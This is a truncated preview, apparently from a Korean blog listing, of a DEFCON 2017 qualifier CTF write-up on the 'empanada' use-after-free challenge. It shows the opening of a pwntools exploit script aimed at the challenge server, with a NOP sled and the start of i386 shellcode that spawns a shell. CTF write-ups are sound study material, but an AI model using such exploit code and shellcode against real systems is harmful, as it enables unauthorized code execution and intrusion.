DEFCON 2017 empanada writeup Its just simple use-after-free. but binary is annoying to reverse... because of C++ stuffs...took me 3~4H to realize how to trigger the UAF from pwn import *context.arch = 'i386' # i386 / arm p = remote('empanada_45e50f0410494ec9cfb90430d2e86287.quals.shallweplayaga.me', 47281)#p = process(['./empanada'])#raw_input('attach ' + str(p.proc.pid)) sh2 = "\x90"*20 + "\x31\xD2\x52\x68\x2F\x2F\x73\x68\.. 더보기 이전 1 2 3 4 5 ··· 423 다음